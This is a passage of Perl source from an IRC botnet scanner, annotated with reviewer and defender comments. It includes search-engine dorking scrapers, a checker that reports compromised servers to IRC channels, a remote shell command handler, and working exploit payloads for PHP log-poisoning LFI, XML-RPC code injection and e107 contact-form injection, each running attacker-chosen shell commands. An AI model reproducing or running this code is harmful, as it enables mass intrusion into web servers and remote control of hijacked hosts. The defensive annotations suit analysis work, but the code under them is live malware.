  3034.         while ($res =~ m/href=\"http:\/\/(.*?)\"/g) {
  3035.             my $link = $1; if ($link!~ /terra/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3036.         }
  3037.     }
  3038. return @list;
  3039. }
  3040. ###
  3041. sub youdao() {
            # Issues a single query to youdao.com for the search phrase in $_[0]
            # and returns the URLs found, expanded by links().
  3042.         my @list;
            # The "{" ending the next line opens a bare block, not a loop: the
            # body runs once.
  3043.         my $key = $_[0]; {
            # $b is the package global left over from whichever sub ran before;
            # it is never set in this sub.
  3044.         my $search = ("http://www.youdao.com/search?q=".&key($key)."&start=10&ue=utf8&keyfrom=".$b."&lq=".&key($key)."&timesort=0");
  3045.         my $res = search_engine_query($search);
  3046.         while ($res =~ m/href=\"http:\/\/(.*?)\"/g) {
  3047.             my $link = $1; if ($link!~ /youdao/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3048.         }
  3049.     }
  3050. return @list;
  3051. }
  3052. ###
  3053. sub amfibi() {
  3054.         my @list;
  3055.         my $key = $_[0]; {
  3056.         my $search = ("http://www.amfibi.com/search?query=".&key($key)."&start=".$b);
  3057.         my $res = search_engine_query($search);
  3058.         while ($res =~ m/href=\"http:\/\/(.*?)\"/g) {
  3059.             my $link = $1; if ($link!~ /amfibi|cache/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3060.         }
  3061.     }
  3062. return @list;
  3063. }
  3064. ###
  3065. sub bigclique() {
            # Collects candidate URLs from bigclique.com result pages for the
            # search phrase in $_[0]; returns the list built by links().
  3066.         my @list;
  3067.         my $key = $_[0];
  3068.         for ($b=1; $b<=200; $b+=10) {
            # $num is an undeclared global that is doubled on every pass. If it
            # starts undefined or 0 it stays 0, so "start=" never advances.
            # NOTE(review): its initial value is not visible here.
  3069.             $num += $num;
  3070.         my $search = ("http://www.bigclique.com/search.jsp?query=".&key($key)."&hitsPerPage=10&start=".$num."&hitsPerSite=".$b);
  3071.         my $res = search_engine_query($search);
  3072.         while ($res =~ m/<a href="http:\/\/(.+?)\"/g) {
  3073.             my $link = $1; if ($link!~ /bigclique|cached/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3074.         }
  3075.     }
  3076. return @list;
  3077. }
  3078. ###
  3079. sub dancefloor() {
  3080.         my @list;
  3081.         my $key = $_[0];
  3082.         for ($b=1; $b<=200; $b+=10) {
  3083.             $num += $num;
  3084.         my $search = ("http://www.dancefloorhireuk.co.uk/events/search.php?query=".&key($key)."&start=".$b."&search=1&results=10&type=and&domain=");
  3085.         my $res = search_engine_query($search);
  3086.         while ($res =~ m/<a href="http:\/\/(.+?)\"/g) {
  3087.             my $link = $1; if ($link!~ /dancefloor|query/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3088.         }
  3089.     }
  3090. return @list;
  3091. }
  3092. ###
  3093. sub rakuten() {
  3094.         my @list;
  3095.         my $key = $_[0];
  3096.         for ($b=1; $b<=200; $b+=10) {
  3097.         my $search = ("http://websearch.rakuten.co.jp/Web?qt=".&key($key)."&col=OW&lg=all&st=".$b."&svx=101722");
  3098.         my $res = search_engine_query($search);
  3099.         while ($res =~ m/<a class="sc_result result" href=\"http:\/\/(.+?)\"/g) {
  3100.             my $link = $1; if ($link!~ /rakuten/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3101.         }
  3102.     }
  3103. return @list;
  3104. }
  3105. ###
  3106. sub nova() {
  3107.         my @list;
  3108.         my $key = $_[0];
  3109.         for ($b=1; $b<=200; $b+=10) {
  3110.             $num += $num;
  3111.         my $search = ("http://nova.rambler.ru/srch?query=".&key($key)."&page=".$b."&start=".$num);
  3112.         my $res = search_engine_query($search);
  3113.         while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {
  3114.             my $link = $1; if ($link!~ /rambler|cache/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3115.         }
  3116.     }
  3117. return @list;
  3118. }
  3119. ###
  3120. sub najdi() {
  3121.         my @list;
  3122.         my $key = $_[0];
  3123.         for ($b=1; $b<=200; $b+=10) {
  3124.             $num += $num;
  3125.         my $search = ("http://www.najdi.si/search.jsp?q=".&key($key)."&o=".$b."&maxHitsPerGroup=".$num);
  3126.         my $res = search_engine_query($search);
  3127.         while ($res =~ m/<a href=\"http:\/\/(.+?)\" onmousedown/g) {
  3128.             my $link = $1; if ($link!~ /najdi|cache/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3129.         }
  3130.     }
  3131. return @list;
  3132. }
  3133. ###
  3134. sub goo() {
  3135.         my @list;
  3136.         my $key = $_[0];
  3137.         for ($b=1; $b<=200; $b+=10) {
  3138.         my $search = ("http://search.goo.ne.jp/web.jsp?STYPE=web&OE=UTF-8&MT=".&key($key)."&IE=UTF-8&FR=".$b."&from=pager");
  3139.         my $res = search_engine_query($search);
  3140.         while ($res =~ m/<a href=\"http:\/\/(.+?)\" onclick/g) {
  3141.             my $link = $1; if ($link!~ /goo/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3142.         }
  3143.     }
  3144. return @list;
  3145. }
  3146. ###
  3147. sub uksubmit() {
  3148.         my @list;
  3149.         my $key = $_[0];
  3150.         for ($b=1; $b<=200; $b+=10) {
  3151.         my $search = ("http://www.uksubmit.co.uk/index.php?query=".&key($key)."&searchType=Web&page=".$b);
  3152.         my $res = search_engine_query($search);
  3153.         while ($res =~ m/<a href="http:\/\/(.+?)\"/g) {
  3154.             my $link = $1; if ($link!~ /uksubmit/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3155.         }
  3156.     }
  3157. return @list;
  3158. }
  3159. ############### NIEUWE ###############
  3160. sub netsprint(){
  3161.         my @list;
  3162.         my $key = $_[0];
  3163.         for($b=1;$b<=1000;$b+=100){
  3164.                 my $Th=("http://www.netsprint.pl/serwis/search?q=".key($key)."&rpp=10&pg=".$b."&ff=0&z=1&format=-1");
  3165.                 my $Res=&search_engine_query($Th);
  3166.                 while($Res =~ m/http:\/\/(.+?)\//g){
  3167.                         my $link = $1; if ($link!~ /netsprint/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3168.                         }
  3169.                 }
  3170. return @list;
  3171. }
  3172. sub saol(){
  3173.         my @list;
  3174.         my $key = $_[0];
  3175.         for($b=1;$b<=1000;$b+=100){
  3176.                 my $Th=("http://search.aol.com/aol/search?enabled_terms=&q=".key($key)."&s_it=comsearch50&page=".$b."&oreq=810a106cf821477ab0349f9caa875f82&v_t=comsearch50");
  3177.                 my $Res=&search_engine_query($Th);
  3178.                 while($Res =~ m/<span property=\"f:durl\">(.+?)<\/span>/g){
  3179.                         my $link = $1; if ($link!~ /aol/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3180.                 }
  3181.         }
  3182. return @list;
  3183. }
  3184. sub lookle(){
  3185.         my @list;
  3186.         my $key = $_[0];
  3187.         for($b=1;$b<=1000;$b+=100){
  3188.                 my $Th=("http://www.lookle.com/search/index.php?page=search/web&search=".key($key)."&type=web&startpage=".$b);
  3189.                 my $Res=&search_engine_query($Th);
  3190.                 while($Res =~ m/http:\/\/(.+?)\//g){
  3191.                         my $link=$1; if ($link!~ /lookle/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3192.                         }
  3193.                 }
  3194. return @list;
  3195. }
  3196. sub optuszoo(){
  3197.         my @list;
  3198.         my $key = $_[0];
  3199.         for($b=10;$b<=1000;$b+=100){
  3200.                 my $Th=("http://www.optuszoo.com.au/search?q=".key($key)."&start=".$b."&target=web");
  3201.                 my $Res=&search_engine_query($Th);
  3202.                 while($Res =~ m/http:\/\/(.+?)\//g){
  3203.                         my $link = $1; if ($link!~ /optuszoo/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3204.                         }
  3205.                 }
  3206. return @list;
  3207. }
  3208. sub search66(){
  3209.         my @list;
  3210.         my $key = $_[0];
  3211.         for($b=10;$b<=1000;$b+=100){
  3212.                 my $Th=("http://search.search66.com/?query=".key($key)."&start=".$b."&offset=20&lang=ENG");
  3213.                 my $Res=&search_engine_query($Th);
  3214.                 while($Res =~ m/http:\/\/(.+?)\//g){
  3215.                         my $link = $1; if ($link!~ /search66/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3216.                         }
  3217.                 }
  3218. return @list;
  3219. }
  3220. sub arrama(){
  3221.         my @list;
  3222.         my $key = $_[0];
  3223.         for($b=10;$b<=1000;$b+=100){
  3224.                 my $Th=("http://www.arrama.com/arama.html?cx=partner-pub-8986600646077390%3A3up8c9-e187&cof=FORID%3A10&ie=UTF-8&q=".key($key)."&sa=Web'de+Ara-Bul&siteurl=www.arrama.com%2F#8".$b."");
  3225.                 my $Res=&search_engine_query($Th);
  3226.                 while($Res =~ m/http:\/\/(.+?)\//g){
  3227.                         my $link = $1; if ($link!~ /arrama/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3228.                 }
  3229.         }
  3230. return @list;
  3231. }
  3232. sub excitejp(){
  3233.         my @list;
  3234.         my $key = $_[0];
  3235.         for($b=10;$b<=1000;$b+=100){
  3236.                 my $Th=("http://www.excite.co.jp/search.gw?target=combined&look=excite_jp&Language=&sstype=excite_r&search=".key($key)."&FirstResult=".$b."");
  3237.                 my $Res=&search_engine_query($Th);
  3238.                 while($Res =~ m/http:\/\/(.+?)\//g){
  3239.                         my $link = $1; if ($link!~ /excite/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3240.                 }
  3241.         }
  3242. return @list;
  3243. }
  3244. sub biglobe(){
  3245.         my @list;
  3246.         my $key = $_[0];
  3247.         for($b=10;$b<=1000;$b+=100){
  3248.                 my $Th=("http://cgi.search.biglobe.ne.jp/cgi-bin/search-st_lp2?start=".$b."&ie=utf8&num=25&q=".key($key)."&lr=all");
  3249.                 my $Res=&search_engine_query($Th);
  3250.                 while($Res =~ m/http:\/\/(.+?)\//g){
  3251.                         my $link = $1; if ($link!~ /biglobe/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3252.                 }
  3253.         }
  3254. return @list;
  3255. }      
  3256. sub clix(){
  3257.         my @list;
  3258.         my $key = $_[0];
  3259.         for($b=1;$b<=1000;$b+=100){
  3260.                 my $Th=("http://pesquisa.clix.pt/resultado.html?question=".key($key)."&in=Mundial&num=25&ckWhere=Mundo&position=".$b."");
  3261.                 my $Res=&search_engine_query($Th);
  3262.                 while($Res =~ m/http:\/\/(.+?)\//g){
  3263.                         my $link = $1; if ($link!~ /clix/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3264.                 }
  3265.         }
  3266. return @list;
  3267. }
  3268. sub searchch(){
  3269.         my @list;
  3270.         my $key = $_[0];
  3271.         for($b=10;$b<=1000;$b+=100){
  3272.                 my $Th=("http://web.search.ch/?rank=".$b."&q=".key($key)."");
  3273.                 my $Res=&search_engine_query($Th);
  3274.                 while($Res =~ m/http:\/\/(.+?)\//g){
  3275.                         my $link = $1; if ($1 !~ /search\.ch/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3276.                 }
  3277.         }
  3278. return @list;
  3279. }
  3280. sub cada(){
  3281.         my @list;
  3282.         my $key = $_[0];
  3283.         for($b=10;$b<=1000;$b+=100){
  3284.                 my $Th=("http://cade.search.yahoo.com/search;_ylt=A0geu8ny1rRO8gQADw7b7Qt.?p=".key($key)."&fr=sfp&xargs=0&pstart=1&b=".$b);
  3285.                 my $Res=&search_engine_query($Th);
  3286.                 while($Res =~ m/http:\/\/(.+?)\//g){
  3287.                         my $link = $1; if ($1 !~ /cada|yahoo/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3288.                         }
  3289.                 }
  3290. return @list;
  3291. }
  3292.  
  3293. #########################################
  3294. sub clean() {
            # Returns its arguments with runs of "/" collapsed to a single "/" and
            # duplicates removed, keeping first-seen order.
  3295.     my @cln = ();
  3296.     my %visit = ();
            # $element aliases each entry of @_, so the substitution below also
            # rewrites the caller's values where they are modifiable.
  3297.     foreach my $element (@_) {
            # Collapses every run of slashes, so a "scheme://" prefix would become
            # "scheme:/" as well.
  3298.         $element =~ s/\/+/\//g;
            # Post-increment: false the first time a value is seen, true after.
  3299.         next if $visit{$element}++;
  3300.         push @cln, $element;
  3301.     }
  3302.     return @cln;
  3303. }
  3304. sub htmltourl { my $str = $_[0]; $str =~ s/&amp;/&/g; return $str; }
  3305. sub key() {
            # Hand-rolled partial URL encoding of the search phrase in $_[0].
            # Spaces become "+" and the characters listed below become %XX.
            # Characters not listed, including "%", "#" and "+", pass through
            # unchanged, so this is not a general-purpose encoder.
  3306.     my $dork = $_[0];
  3307.     $dork =~ s/ /\+/g;
  3308.     $dork =~ s/:/\%3A/g;
  3309.     $dork =~ s/\//\%2F/g;
  3310.     $dork =~ s/\?/\%3F/g;
  3311.     $dork =~ s/&/\%26/g;
  3312.     $dork =~ s/\"/\%22/g;
  3313.     $dork =~ s/,/\%2C/g;
  3314.     $dork =~ s/\\/\%5C/g;
  3315.         $dork =~ s/@/\%40/g;
  3316.         $dork =~ s/\[/\%5B/g;
  3317.         $dork =~ s/\]/\%5D/g;
            # Repeats the "?" substitution made above; nothing is left to replace.
  3318.         $dork =~ s/\?/\%3F/g;
  3319.         $dork =~ s/\=/\%3D/g;
  3320.         $dork =~ s/\|/\%7C/g;
  3321.     return $dork;
  3322. }
  3323.  
  3324. sub links() {
            # Expands one captured "host/path" string into three entries, each
            # ending in "/": the full string, the host part, and the string with
            # its last path segment removed.
  3325.     my @list;
  3326.     my $link = $_[0];
  3327.     my $host = $_[0];
  3328.     my $hdir = $_[0];
            # Drop everything after the last "/" (no change if there is no "/").
  3329.     $hdir =~ s/(.*)\/[^\/]*$/$1/;
            # Keep only the first run of host characters that is followed by "/".
  3330.     $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  3331.     $host .= "/";
  3332.     $link .= "/";
  3333.     $hdir .= "/";
            # Collapse "//" pairs created by the appended slash.
  3334.     $host =~ s/\/\//\//g;
  3335.     $hdir =~ s/\/\//\//g;
  3336.     $link =~ s/\/\//\//g;
            # For a bare hostname all three entries are identical; nothing is
            # de-duplicated in this sub.
  3337.     push(@list,$link,$host,$hdir);
  3338.     return @list;
  3339. }
  3340.  
  3341. sub search_engine_query($) {
            # Fetches $_[0] with a hand-written HTTP/1.0 GET over a raw TCP socket
            # to port 80 and returns the whole response (status line, headers and
            # body) as one string. Returns "" when the connection fails or any
            # error is raised inside the eval.
  3342.     my $url = $_[0];
  3343.     $url =~ s/http:\/\///;
  3344.     my $host = $url;
  3345.     my $query = $url;
  3346.     my $page  = "";
  3347.     $host =~ s/href=\"?http:\/\///;
  3348.     $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
            # $host is interpolated as a regex, not a literal: its dots match any
            # character, and only the first match is removed.
  3349.     $query =~ s/$host//;
  3350.     if ($query eq "") { $query = "/"; }
            # Errors inside the block are discarded; $@ is never inspected.
  3351.         eval {
            # "or return" leaves only the eval block; the sub still reaches the
            # final return with $page empty. No Timeout is passed to the
            # constructor.
  3352.             my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return;
            # $uagent is defined outside this sub. The request line, Host, Accept
            # and User-Agent are the only things sent, which is the on-the-wire
            # shape a proxy or search operator would see.
  3353.             print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: $uagent\r\n\r\n";
            # Reads until the peer closes the connection.
  3354.             my @pages = <$sock>;
            # Interpolating the array joins the lines with a space (default $").
  3355.             $page = "@pages";
  3356.             close($sock);
  3357.         };
  3358.     return $page;
  3359. }
  3360.  
  3361. ##[ INFO OS ]##
  3362. sub info_main {
          # Fetches $url and, if the page carries the "ID: 0wn3d" marker line,
          # parses the host details printed on it and reports them to IRC.
          # Arguments: $url (page to check), $chan (channel for the summary),
          # $engine and $logo (text placed in the summary line).
          # Defender note: the literal <font ...><b>FIELD:</b> lines matched
          # below are the page format this bot looks for, so the same strings
          # can be searched for in web roots and in HTTP responses.
  3363.   my ($url,$chan,$engine,$logo) = @_;
  3364.   my $safemode;
  3365.  
        # Two values are picked at random per call and spliced into the messages
        # below (presumably IRC colour codes - TODO confirm). $infoc and $inftc
        # are globals.
  3366. my @inff = ("2","3","5","13","11","12"); # info
  3367. $infoc = $inff[rand(scalar(@inff))]; my $inc = $infoc;
  3368.  
  3369. my @inft = ("7","6","10","8","14","15"); # info txt
  3370. $inftc = $inft[rand(scalar(@inft))]; my $inf = $inftc;
  3371.  
                # get_content() is defined elsewhere in the file.
  3372.         my $check = &get_content($url);sleep(3);
  3373.         if ($check =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/ ) {
  3374.                 my $safe =""; my $os ="";my $uname ="";my $server ="";my $user ="";my $uid ="";my $dir ="";my $perm ="";my $hdd ="";my $disfunc ="";
                        # Each /g match in scalar context resumes where the previous
                        # successful match on $check ended, so the fields are
                        # expected in this order on the page.
  3375.                 if ($check =~ m/<font face='verdana' size='2'><b>SAFE:<\/b> (.+?)<\/font><br>/g ) { $safe = $1; }
  3376.                 if ($check =~ m/<font face='verdana' size='2'><b>OS:<\/b> (.+?)<\/font><br>/g ) { $os = $1; }
  3377.                 if ($check =~ m/<font face='verdana' size='2'><b>UNAME:<\/b> (.+?)<\/font><br>/g ) { $uname = $1; }
  3378.                 if ($check =~ m/<font face='verdana' size='2'><b>SERVER:<\/b> (.+?)<\/font><br>/g ) { $server = $1; }
  3379.                 if ($check =~ m/<font face='verdana' size='2'><b>USER:<\/b> (.+?)<\/font><br>/g ) { $user = $1; }
  3380.                 if ($check =~ m/<font face='verdana' size='2'><b>UID:<\/b> (.+?)<\/font><br>/g ) { $uid = $1; }
  3381.                 if ($check =~ m/<font face='verdana' size='2'><b>DIR:<\/b> (.+?)<\/font><br>/g ) { $dir = $1; }
  3382.                 if ($check =~ m/<font face='verdana' size='2'><b>PERM:<\/b> (.+?)<\/font><br>/g ) { $perm = $1; }
  3383.                 if ($check =~ m/<font face='verdana' size='2'><b>HDD:<\/b> (.+?)<\/font><br>/g ) { $hdd = $1; }
  3384.                 if ($check =~ m/<font face='verdana' size='2'><b>DISFUNC:<\/b> (.+?)<\/font><br>/g ) { $disfunc = $1; }
  3385.                 if ($safe =~ /OFF/) { $safemode = "9OFF (Not Secure)"; } elsif ($safe =~ /ON/) { $safemode ="4ON (Secure)"; } else { $safemode ="1-"; }
  3386.                 if ($disfunc) { $disfunc = "12(4@".$inc."Disfunc12)".$inf." $disfunc "; } else { $disfunc = ""; }
                        # Both branches assign the same value; the test has no effect.
  3387.                 if ($perm =~/W/) { $perm = "$perm"; } else { $perm = "$perm"; }
                                # Summary line to the calling channel.
  3388.                         &msg("$chan","$logo12(4@0$engine12)(4@8SHELL12)13 ".$url." 12(4@8safemode12) ".$safemode." 12(4@8OS12)13 ".$os." ");
                                # With $conf{shchan} set to 1 the full detail (uname, user,
                                # uid, server, directory, disk, disabled functions) goes to
                                # the channel in $shchn; both are defined outside this sub.
  3389.                         if ($conf{shchan} == 1) {
  3390.                
  3391.                                 &msg("$shchn","12(4@".$inc."SHELL12)".$inf." ".$url." 12(4@".$inc."safemode12) ".$safemode." 12(4@".$inc."OS12)".$inf." ".$os." ");
  3392.                                 &msg("$shchn","12(4@".$inc."Uname12)".$inf." ".$uname." 12(4@".$inc."User12)".$inf." ".$user." ".$inc."/".$inf." ".$uid." 12(4@".$inc."Server12)".$inf." ".$server." ");
  3393.                                 &msg("$shchn","12(4@".$inc."Dir12)".$inf." ".$dir." ".$perm." 12(4@".$inc."HDD12)".$inf." ".$hdd." ".$disfunc." ");sleep(2);
  3394.  
  3395.                         }
  3396.         }
  3397. }
  3398.  
  3399. #########################################
  3400. sub shell() {
            # Runs the command string in $_[1] on the local host through the shell
            # and relays its output as IRC messages to the target in $_[0].
            # Defender note: this is the bot's remote command channel. On the
            # host it shows up as a perl process whose detached child spawns a
            # shell; on the network, as bursts of up to five PRIVMSG lines
            # separated by two-second pauses.
  3401.     my $path = $_[0];
  3402.     my $cmd = $_[1];
            # Unanchored: any command containing "cd " is handled as a directory
            # change of the bot process itself, and nothing is executed.
  3403.     if ($cmd =~ /cd (.*)/) {
  3404.         chdir("$1") || &msg("$path","No such file or directory");
  3405.         return;
  3406.     }
            # Double fork: the parent reaps the first child, which exits at once,
            # so the grandchild that runs the command is detached from the bot.
  3407.     elsif ($pid = fork) { waitpid($pid, 0); }
  3408.     else { if (fork) { exit; } else {
            # Backticks pass $cmd to the shell unmodified; stderr and descriptor 3
            # are redirected into the captured output.
  3409.         my @output = `$cmd 2>&1 3>&1`;
  3410.         my $c = 0;
  3411.         foreach my $output (@output) {
  3412.             $c++;
            # chop removes the last character whatever it is (normally the
            # newline).
  3413.             chop $output;
  3414.             &msg("$path","$output");
            # Pause after every fifth line, presumably to stay under IRC flood
            # limits.
  3415.             if ($c == 5) { $c = 0; sleep 2; }
  3416.         }
  3417.         exit;
  3418.     }}
  3419. }
  3420.  
  3421. sub creator() {
                # Returns 1 when the MD5 hex digest of $_[0] matches one of two
                # hard-coded digests, else 0. md5_hex is defined or imported
                # outside this sub.
                # Defender note: the two digests are fixed strings in the script,
                # so they can serve as static indicators for this variant.
  3422.         my $status = 0;
  3423.         my $master = $_[0];
                # "=~" treats the right-hand string as an unanchored pattern. For a
                # 32-character hex digest that is in effect an equality test.
  3424.         if (&md5_hex($master) =~ "636d407d474e8d3bab31c3da4a1908e9") { $status = 1 }
  3425.         if (&md5_hex($master) =~ "1624b927eecd7d3ab2d7b6ba91f7adf8") { $status = 1 }
  3426.         return $status;
  3427. }
  3428.  
  3429. sub isAdmin() {
            # Returns 1 when $_[0] equals the global $admin, else 0.
            # The check is a string comparison on the supplied nick alone; no
            # other proof of identity is examined in this sub.
  3430.     my $status = 0;
  3431.     my $nick = $_[0];
  3432.     if ($nick eq $admin) { $status = 1; }
  3433.     return $status;
  3434. }
  3435.  
  3436. sub msg() {
            # Sends "PRIVMSG <target> :<text>" via sendraw() on $IRC_cur_socket;
            # both are defined outside this sub. Does nothing unless exactly two
            # arguments are given. Neither argument is checked for CR/LF before
            # being placed in the IRC line.
  3437.     return unless $#_ == 1;
  3438.     sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]");
  3439. }
  3440.  
  3441. sub nick() {
            # Sends "NICK <name>" via sendraw(); does nothing unless exactly one
            # argument is given.
            # NOTE(review): msg() passes a socket as sendraw's first argument and
            # this call does not; sendraw is not visible here, so whether it
            # accepts both forms is unconfirmed.
  3442.     return unless $#_ == 0;
  3443.     sendraw("NICK $_[0]");
  3444. }
  3445.  
  3446. sub notice() {
            # Sends "NOTICE <target> :<text>" via sendraw(); does nothing unless
            # exactly two arguments are given.
            # NOTE(review): like nick(), this calls sendraw without the socket
            # argument that msg() passes - confirm against sendraw's definition.
  3447.     return unless $#_ == 1;
  3448.     sendraw("NOTICE $_[0] :$_[1]");
  3449. }
  3450.  
  3451. sub cmdlfi() {
        # Sends one GET to $_[0] with the User-Agent header set to a PHP snippet
        # wrapped in the marker "j13mbut", then reports whatever the response
        # contains between two markers to the IRC target in $_[2].
        # $_[1] is the command text placed inside the snippet.
        # Defender note: the request is recognisable by a User-Agent containing
        # "<?" or the marker string. It only has an effect where the target
        # includes attacker-influenced data (such as logged request headers) as
        # PHP; that precondition is inferred from the code, not shown in it.
  3452. my $browser = LWP::UserAgent->new;
  3453. my $url  = $_[0];
  3454. my $cmd  = $_[1];
  3455. my $chan = $_[2];
  3456. my $hie = "j13mbut<?system(\"$cmd 2> /dev/stdout\"); ?>j13mbut";
  3457. $browser->agent("$hie");
  3458. $browser->timeout(7);
        # $response is not declared with "my", so it is a package global.
  3459. $response = $browser->get( $url );
        # /s lets "." cross newlines, so multi-line output is captured whole.
  3460. if ($response->content =~ /j13mbut(.*)j13mbut/s) {
  3461. &msg("$chan","0,1(0LFI0)4 $1 ");
  3462. } else {
  3463. &msg("$chan","0,1(0LFI0)4 No Output ");
  3464. }
  3465. }
  3466.  
  3467. sub cmdxml() {
        # POSTs an XML-RPC methodCall to the URL in $_[0] whose <name> element
        # carries PHP code built around the command text in $_[1]. Whatever the
        # response contains between "bamby" and "solo" is reported to the IRC
        # target in $_[2].
        # Defender note: observable as a text/xml POST with User-Agent
        # "perl post" and a methodCall body containing "system(" inside <name>.
        # It presumably targets an XML-RPC implementation that evaluates that
        # element - TODO confirm which library.
  3468. my $jed  = $_[0];
  3469. my $dwa  = $_[1];
  3470. my $chan = $_[2];
  3471. my $userAgent = LWP::UserAgent->new(agent => 'perl post');
                # $exploit is a package global; $dwa is concatenated in unescaped.
  3472.         $exploit = "<?xml version=\"1.0\"?><methodCall>";
  3473.         $exploit .= "<methodName>test.method</methodName>";
  3474.         $exploit .= "<params><param><value><name>',''));";
  3475.         $exploit .= "echo'bamby';system('".$dwa."');echo'solo';exit;/*</name></value></param></params></methodCall>";
        # No timeout is set on this user agent, unlike cmdlfi() and cmde107().
  3476. my $response = $userAgent->request(POST $jed,Content_Type => 'text/xml',Content => $exploit);
  3477. if ($response->content =~ /bamby(.*)solo/s) {
  3478. &msg("$chan","0,1(0XML0)4 $1 ");
  3479. } else {
  3480. &msg("$chan","0,1(0XML0)4 No Output ");
  3481. }
  3482. }
  3483.  
  3484. sub cmde107() {
        # POSTs a form submission to the URL in $_[0] whose author_name field
        # holds PHP code between [php] and [/php] tags; the code in $_[1] is
        # embedded base64-encoded. Text following "ByroeNet" in the response is
        # reported to the IRC target in $_[2].
        # The sub name and the "send-contactus" field suggest an e107 contact
        # form is the intended target - inferred, not shown here.
        # Defender note: observable as a form POST whose author_name starts with
        # "%5Bphp%5D" and contains base64_decode/shell_exec calls. The fixed
        # base64 literals decode to "BaMbY", "id" and "ByroeNet".
  3485. my $path  = $_[0];
  3486. my $code = $_[1];
  3487. my $chan  = $_[2];
        # encode_base64 is imported outside this sub.
  3488. my $codecmd = encode_base64($code);
  3489. my $cmd = 'echo(base64_decode("QmFNYlk=").shell_exec(base64_decode("aWQ=")).base64_decode("Qnlyb2VOZXQ=")).shell_exec(base64_decode("'.$codecmd.'"));';
  3490.     my $req = HTTP::Request->new(POST => $path);
  3491.     $req->content_type('application/x-www-form-urlencoded');
  3492.     $req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3Bdie%28%29%3B%5B%2Fphp%5D");
            # $uagent is defined outside this sub.
  3493.     my $ua = LWP::UserAgent->new(agent => $uagent);
  3494.     $ua->timeout(7);
  3495.     my $res = $ua->request($req);
        # as_string includes the status line and headers as well as the body.
  3496. my $data = $res->as_string;
        # No /s modifier: only the rest of the line after the marker is captured.
        # $mydata is a package global.
  3497. if ( $data =~ /ByroeNet(.*)/ ){
  3498.      $mydata = $1;
  3499. &msg("$chan","0,1(0E1070)4 $mydata ");
  3500. }
  3501. else { &msg("$chan","0,1(0E1070)4 No Output "); }
  3502. }
